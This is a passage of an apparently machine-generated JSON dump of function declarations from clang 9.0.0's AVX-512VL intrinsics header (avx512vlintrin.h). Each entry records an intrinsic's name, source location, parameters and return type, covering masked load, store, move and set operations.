}, { "tag": "function", "name": "_mm256_maskz_mov_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5066:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5074:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5080:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5089:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5099:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5105:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_store_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_store_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_store_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5138:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_store_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_mov_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5152:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mov_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mov_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mov_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5176:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5184:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5190:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5199:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5209:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5215:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5224:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_store_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5234:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_store_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5240:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_store_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5248:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_store_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5262:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5270:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5278:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_movedup_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5286:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5294:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5302:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5310:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5318:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5327:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5335:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5343:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5351:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5431:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5439:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5448:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5456:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5465:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5473:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5482:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5499:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5508:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5516:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5525:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5534:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5542:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5551:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5560:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5568:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5577:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5594:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5603:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5611:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5620:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5628:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5637:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5645:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5654:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5662:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_store_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5671:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_store_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5679:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_store_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5687:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_store_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5695:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5703:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_storeu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5712:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", 